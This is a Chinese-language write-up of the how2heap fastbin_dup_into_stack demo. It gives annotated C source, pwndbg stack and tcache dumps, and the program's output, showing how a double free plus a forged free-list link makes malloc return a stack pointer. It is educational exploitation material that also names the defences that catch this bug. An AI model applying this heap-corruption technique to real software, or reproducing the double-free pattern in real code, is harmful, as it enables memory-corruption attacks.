fastbin



fastbin

源码如下

/*
 * how2heap-style demonstration (fastbin_dup_into_stack): a double free of one
 * small chunk, followed by a write into that freed chunk, makes malloc() hand
 * back a pointer into this function's own stack frame.
 *
 * Everything after the first free(a) is undefined behaviour (double free,
 * write-after-free, later use of a "heap" pointer that is really a stack slot).
 * The program only runs to completion because it is built without sanitizers
 * against a libc whose allocator does not reject these operations: with
 * -fsanitize=address the second free(a) aborts with a double-free report, and
 * newer glibc (2.29+) adds a per-entry key check to tcache that aborts that
 * same free. Those are the detections a defender relies on for this bug class.
 *
 * The listing assumes <stdio.h> and <stdlib.h> are included above (the
 * includes are not part of the pasted source). No explicit return: falling
 * off the end of main yields 0 under C99 and later.
 */
int main()
{
    fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
           "returning a pointer to a controlled location (in this case, the stack).\n");
    /* Stack slot that malloc will later read as a chunk size field; it stays
     * uninitialised until the assignment further down. */
    unsigned long long stack_var;
    /* This message predicts &stack_var + 8. In the run pasted below the 4th
     * malloc actually returned &stack_var - 8 (0x...e8c8 vs. a predicted
     * 0x...e8d8), which is exactly the value written into *d later on; together
     * with the "tcachebins" lines in the pwndbg output this is consistent with
     * the requests being served from tcache rather than the fastbins, so the
     * header/size adjustment the message assumes did not happen. */
    fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
    fprintf(stderr, "Allocating 3 buffers.\n");
    /* Three same-size chunks (0x20 in the bins shown below). Allocation
     * failures are not checked - demo code. c is printed but never freed
     * or otherwise used. */
    int *a = malloc(8);
    int *b = malloc(8);
    int *c = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", a);
    fprintf(stderr, "2nd malloc(8): %p\n", b);
    fprintf(stderr, "3rd malloc(8): %p\n", c);
    fprintf(stderr, "Freeing the first one...\n");
    free(a);
    fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
    // free(a);
    fprintf(stderr, "So, instead, we'll free %p.\n", b);
    /* Freeing a different chunk in between is what lets the second free(a)
     * slip past the "head of list == chunk being freed" check. */
    free(b);
    fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
    /* The double free. The free list now holds a twice (a -> b -> a, see the
     * first pwndbg "bins" dump below), so a later malloc returns a while
     * another copy of a is still queued behind it. */
    free(a);
    fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
        "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
    /* d receives the first copy of a (same address as a in the pasted output),
     * so writes through d land in a chunk that is still on the free list. */
    unsigned long long *d = malloc(8);
    fprintf(stderr, "1st malloc(8): %p\n", d);
    /* Returns b; the pointer is printed and dropped (leaked). */
    fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
    fprintf(stderr, "Now the free list has [ %p ].\n", a);
    fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
        "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
        "so that malloc will think there is a free chunk there and agree to\n"
        "return a pointer to it.\n", a);
    /* Fake size field: 0x20 matches the bin these 8-byte requests fall into
     * ("0x20 [ 3]" in the pwndbg output). */
    stack_var = 0x20;
    fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
    /* Write-after-free into chunk a (d == a): its first 8 bytes are the
     * allocator's "next" link while the chunk is free. The value stored is the
     * address 8 bytes below stack_var - where a chunk header would sit if
     * stack_var were its size field. sizeof(d) is the pointer size (8 on
     * this x86-64 run); the cast through unsigned long long assumes that width. */
    *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
    /* Returns a again (second copy); the allocator now takes the forged link
     * as the next free chunk. Return value leaked. */
    fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
    /* Returns the forged stack address; printed and dropped. Any write through
     * it would corrupt main's own frame (the dumps show it sits 0x30 below the
     * saved canary / rbp). */
    fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
}

 

In file: /ctf/work/fastbin_dup_into_stack.c
   22     free(b);
   23     fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
   24     free(a);
   25     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
   26         "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
 ► 27     unsigned long long *d = malloc(8);
   28     fprintf(stderr, "1st malloc(8): %p\n", d);
   29     fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
   30     fprintf(stderr, "Now the free list has [ %p ].\n", a);
   31     fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
   32         "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp  0x7ffc9567e120 —▸ 0x7f9f57a149a0 (_dl_fini) ◂— push   rbp
01:0008│      0x7ffc9567e128 —▸ 0x55750a93b260 —▸ 0x55750a93b280 ◂— 0x55750a93b260
02:0010│      0x7ffc9567e130 —▸ 0x55750a93b280 —▸ 0x55750a93b260 ◂— 0x55750a93b280
03:0018│      0x7ffc9567e138 —▸ 0x55750a93b2a0 ◂— 0x0
04:0020│      0x7ffc9567e140 —▸ 0x7ffc9567e230 ◂— 0x1
05:0028│      0x7ffc9567e148 ◂— 0x8c79f101a3a09e00
06:0030│ rbp  0x7ffc9567e150 —▸ 0x55750a12dae0 (__libc_csu_init) ◂— push   r15
07:0038│      0x7ffc9567e158 —▸ 0x7f9f57634b97 (__libc_start_main+231) ◂— mov    edi, eax
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
 ► f 0     55750a12d9a4 main+474
   f 1     7f9f57634b97 __libc_start_main+231
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bins
tcachebins
0x20 [  3]: 0x55750a93b260 —▸ 0x55750a93b280 ◂— 0x55750a93b260
标准Double free链表如上

In file: /ctf/work/fastbin_dup_into_stack.c
   34         "return a pointer to it.\n", a);
   35     stack_var = 0x20;
   36     fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
   37     *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
   38     fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
 ► 39     fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
   40 }
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp  0x7ffc9567e120 ◂— 0x20 /* ' ' */
01:0008│      0x7ffc9567e128 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— mov    edi, 8
02:0010│      0x7ffc9567e130 —▸ 0x55750a93b280 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— ...
03:0018│      0x7ffc9567e138 —▸ 0x55750a93b2a0 ◂— 0x0
04:0020│      0x7ffc9567e140 —▸ 0x55750a93b260 —▸ 0x7ffc9567e118 —▸ 0x55750a12da98 (main+718) ◂— mov    edi, 8
05:0028│      0x7ffc9567e148 ◂— 0x8c79f101a3a09e00
06:0030│ rbp  0x7ffc9567e150 —▸ 0x55750a12dae0 (__libc_csu_init) ◂— push   r15
07:0038│      0x7ffc9567e158 —▸ 0x7f9f57634b97 (__libc_start_main+231) ◂— mov    edi, eax
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
 ► f 0     55750a12da98 main+718
   f 1     7f9f57634b97 __libc_start_main+231
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bins
tcachebins
0x20 [  0]: 0x7ffc9567e118

如上代码伪造了 chunk 的大小字段,使其通过 malloc 的检查,从而让 malloc 返回栈指针 0x7ffc9567e118。

完整运行结果如下

This file extends on fastbin_dup.c by tricking malloc into
returning a pointer to a controlled location (in this case, the stack).
The address we want malloc() to return is 0x7ffe87d0e8d8.
Allocating 3 buffers.
1st malloc(8): 0x556e60d82260
2nd malloc(8): 0x556e60d82280
3rd malloc(8): 0x556e60d822a0
Freeing the first one...
If we free 0x556e60d82260 again, things will crash because 0x556e60d82260 is at the top of the free list.
So, instead, we'll free 0x556e60d82280.
Now, we can free 0x556e60d82260 again, since it's not the head of the free list.
Now the free list has [ 0x556e60d82260, 0x556e60d82280, 0x556e60d82260 ]. We'll now carry out our attack by modifying data at 0x556e60d82260.
1st malloc(8): 0x556e60d82260
2nd malloc(8): 0x556e60d82280
Now the free list has [ 0x556e60d82260 ].
Now, we have access to 0x556e60d82260 while it remains at the head of the free list.
so now we are writing a fake free size (in this case, 0x20) to the stack,
so that malloc will think there is a free chunk there and agree to
return a pointer to it.
Now, we overwrite the first 8 bytes of the data at 0x556e60d82260 to point right before the 0x20.
3rd malloc(8): 0x556e60d82260, putting the stack address on the free list
4th malloc(8): 0x7ffe87d0e8c8
 
